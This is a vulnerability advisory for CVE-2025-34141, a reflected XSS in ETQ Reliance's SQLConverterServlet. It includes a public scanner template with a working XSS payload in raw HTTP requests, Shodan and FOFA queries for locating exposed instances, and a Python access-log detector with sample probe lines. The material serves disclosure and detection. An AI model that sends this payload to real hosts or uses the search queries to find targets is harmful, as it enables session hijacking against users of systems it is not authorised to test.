CVE-2025-34141: ETQ Reliance - Reflected XSS via SQLConverterServlet

Date: 2025-08-01 | Affected software: ETQ Reliance | PoC: public

Vulnerability description

A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.

PoC code [public]

id: CVE-2025-34141

info:
  name: ETQ Reliance - Reflected XSS via SQLConverterServlet
  author: slcyber,pdresearch
  severity: medium
  description: |
    A reflected cross-site scripting (XSS) vulnerability exists in ETQ Reliance CG (legacy) platform within the SQLConverterServlet component. This vulnerability requires user interaction, such as clicking a crafted link, and may result in execution of unauthorized scripts in the user's context. The affected servlet was unnecessarily exposed to authenticated users and has since been disabled in version SE.2025.1.
  impact: |
    Successful exploitation allows attackers to execute arbitrary JavaScript in the context of an authenticated user's browser session, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to ETQ Reliance version SE.2025.1 or later where the SQLConverterServlet has been disabled.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34141
    - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/
  classification:
    epss-score: 0.01778
    epss-percentile: 0.8204
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2025-34141
    cwe-id: CWE-79
    cpe: cpe:2.3:a:etq:reliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: etq
    product: reliance
    shodan-query: 'html:"ETQ Reliance"'
    fofa-query: 'body="ETQ Reliance"'
  tags: cve,cve2025,etq,reliance,xss,reflected-xss,vkev

flow: |
  http(1)
  if(template.path){
   http(2)
  } else {
   set("path","reliance")
   http(2)
  }

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: header
        internal: true
        name: path
        group: 1
        regex:
          - 'Location: https?://.*?/(.*?)/'

  - raw:
      - |
        GET /{{path}}/SQLConverterServlet?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - '</textarea><img src=x onerror=alert(document.domain)>'
          - 'You have to start the ENGINE application before using this form.'
        condition: and
# digest: 490a0046304402205f1a17fa7c18baa2876a30f0fd6866b1409d21014eaa91d2eb3e60b928a5241202203461f8483a5a8c09f0dd42298a97563d2ad0f7ccf947af2baaf95459207d2e06:922c64590222798bb761d5b6d8e72950
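The template above probes the servlet over the wire; a defender who cannot upgrade yet will also want to know whether anyone has already sent such requests. The following detector, added here as an example and not part of the template or of ETQ's code, parses web-server access logs, locates requests to SQLConverterServlet under any context path (mirroring the template's path extraction), and flags a MySQLStm parameter that carries HTML markup rather than SQL text. The combined log format and the sample lines are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined/common log format (assumed); only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Heuristic for HTML inside a parameter that should only carry SQL text:
# a textarea close tag (the breakout used in the PoC), any opening tag,
# or an inline event handler. Tuned for recall; review hits by hand.
MARKUP_RE = re.compile(
    r'</\s*textarea|<\s*[a-z][a-z0-9]*[\s/>]|\bon[a-z]+\s*=', re.IGNORECASE
)

def analyze_line(line):
    """Return a finding dict for a SQLConverterServlet request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Match the servlet name under any context path (/reliance/ or another)
    if not parts.path.lower().endswith("/sqlconverterservlet"):
        return None
    stm = parse_qs(parts.query, keep_blank_values=True).get("MySQLStm", [""])[0]
    decoded = unquote(stm)  # parse_qs decoded once; again for double encoding
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": m.group("status"),
        "payload": decoded,
        "suspicious": bool(MARKUP_RE.search(decoded)),
    }

def scan_log(lines):
    """Return findings for requests whose MySQLStm parameter carries markup."""
    return [f for f in map(analyze_line, lines) if f and f["suspicious"]]

# Constructed sample lines: the PoC probe on the default context path, a probe
# on a non-default context path, a benign use of the servlet, an unrelated hit.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Aug/2025:10:00:01 +0000] "GET /reliance/SQLConverterServlet'
    '?MySQLStm=%3C/textarea%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1" 200 1834',
    '203.0.113.6 - - [01/Aug/2025:10:00:02 +0000] "GET /etq/SQLConverterServlet'
    '?MySQLStm=%3C/textarea%3E HTTP/1.1" 200 1790',
    '198.51.100.7 - jdoe [01/Aug/2025:10:00:03 +0000] "GET /reliance/SQLConverterServlet'
    '?MySQLStm=SELECT+1 HTTP/1.1" 200 912',
    '198.51.100.9 - - [01/Aug/2025:10:00:04 +0000] "GET /reliance/login.jsp HTTP/1.1" 200 3321',
]
```

Running scan_log over SAMPLE_LOG returns the two probe lines and leaves the legitimate SQL request and the unrelated page hit out; a hit on a host already running SE.2025.1 is a probe against a disabled servlet, not a successful exploitation.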
